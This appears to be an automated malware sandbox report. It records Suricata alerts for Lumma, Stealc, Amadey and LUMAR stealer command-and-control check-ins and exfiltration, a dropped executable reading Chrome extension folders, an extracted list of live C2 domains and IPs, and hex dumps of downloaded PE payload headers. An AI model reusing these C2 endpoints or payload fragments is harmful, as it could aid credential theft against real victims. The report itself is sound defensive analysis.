Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.219:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.62:443 -> 192.168.2.4:50085 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2160323132.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: ntkrnlmp.pdbx, source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009859000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\Benefit\Benefit\obj\Release\Benefit.pdb source: GWZ8arC.exe, 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, GWZ8arC.exe, 00000013.00000000.2581657936.0000000000462000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3Xwk4R.exe, 0000002B.00000000.2770515108.0000000000B3B000.00000002.00000001.01000000.00000016.sdmp, w3Xwk4R.exe, 0000002B.00000002.2802414314.0000000000B3B000.00000002.00000001.01000000.00000016.sdmp, w3Xwk4R.exe, 0000002C.00000002.2796954947.0000000000BCB000.00000002.00000001.01000000.00000018.sdmp, w3Xwk4R.exe, 0000002C.00000000.2779208534.0000000000BCB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\MindClient\Bin\MindClient.pdb source: TiVoServer.exe, 0000002D.00000002.2828781723.0000000000B48000.00000002.00000001.01000000.00000022.sdmp, TiVoServer.exe, 0000002D.00000003.2808610932.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, MindClient.dll.44.dr
Source:	Binary string: nss3.pdb@ source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Benefit\Benefit\obj\Release\Benefit.pdbT=n= `=_CorExeMainmscoree.dll source: GWZ8arC.exe, 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, GWZ8arC.exe, 00000013.00000000.2581657936.0000000000462000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\tmp\author\3rdParty\loudmouth-1.3\loudmouth\Release\loudmouth.pdb source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\wspconfig\Bin\wspconfig.pdb source: TiVoServer.exe, 0000002D.00000003.2813068341.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2882291241.000000001006F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009859000.00000004.00000020.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000002.2895898571.000000000985D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009853000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: TiVoServer.exe, 0000002D.00000002.2872872363.0000000009DA0000.00000004.00000800.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2869346565.0000000009A4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TiVoServer.exe, 0000002D.00000002.2872872363.0000000009DA0000.00000004.00000800.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2869346565.0000000009A4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries.x86ret\bin\i386\Optimization\opt\bin\i386\vspkgs\msvb7.pdb source: w3Xwk4R.exe, 0000002C.00000002.2798497111.000000006B1A1000.00000020.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\tmp\author\3rdParty\loudmouth-1.3\loudmouth\Release\loudmouth.pdbl7 source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.1.dr
Source:	Binary string: mozglue.pdb source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2160323132.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\MindClient\Bin\MindClient.pdbT source: TiVoServer.exe, 0000002D.00000002.2828781723.0000000000B48000.00000002.00000001.01000000.00000022.sdmp, TiVoServer.exe, 0000002D.00000003.2808610932.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, MindClient.dll.44.dr

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 19MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060100 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (friendseforever .help) : 192.168.2.4:53333 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49738 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060101 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI) : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49893 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49942 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49907
Source: Network traffic	Suricata IDS: 2060104 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shiningrstars .help) : 192.168.2.4:52644 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:49969 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:49963 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:49978 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49973 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50017 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:50029 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:50019 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:50041 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:50051 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2060105 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI) : 192.168.2.4:50062 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50069 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50071 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2048736 - Severity 1 - ET MALWARE LUMAR Stealer Exfiltration M2 : 192.168.2.4:50075 -> 185.244.212.106:2227
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50077 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49963 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49963 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49969 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50041 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50062 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50080 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50076 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50076 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50086 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50078 -> 104.21.23.62:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: shiningrstars.help
Source: Malware configuration extractor	URLs: mercharena.biz
Source: Malware configuration extractor	URLs: generalmills.pro
Source: Malware configuration extractor	URLs: stormlegue.com
Source: Malware configuration extractor	URLs: blast-hubs.com
Source: Malware configuration extractor	URLs: blastikcn.com
Source: Malware configuration extractor	URLs: nestlecompany.pro
Source: Malware configuration extractor	URLs: 196.251.87.37
Source: Malware configuration extractor	URLs: 185.244.212.106:2227
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	TCP traffic: 192.168.2.4:50065 -> 195.177.95.118:4782
Source: global traffic	TCP traffic: 192.168.2.4:50075 -> 185.244.212.106:2227

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:22:56 GMTContent-Type: application/octet-streamContent-Length: 1766400Last-Modified: Sat, 15 Feb 2025 15:29:38 GMTConnection: keep-aliveETag: "67b0b2e2-1af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 90 67 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 67 00 00 04 00 00 31 8a 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 68 69 67 6b 64 6a 00 50 19 00 00 30 4e 00 00 4e 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 69 68 6d 76 6e 78 6f 00 10 00 00 00 80 67 00 00 04 00 00 00 ce 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 67 00 00 22 00 00 00 d2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:22:58 GMTContent-Type: application/octet-streamContent-Length: 2125312Last-Modified: Sat, 15 Feb 2025 15:29:48 GMTConnection: keep-aliveETag: "67b0b2ec-206e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 90 fa 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 9c 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 9c 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 30 04 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 b0 06 00 00 02 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 69 70 6b 71 73 65 00 b0 19 00 00 f0 30 00 00 ae 19 00 00 9a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 74 7a 63 76 6b 67 76 00 10 00 00 00 a0 4a 00 00 04 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 4c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 15 Feb 2025 16:23:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 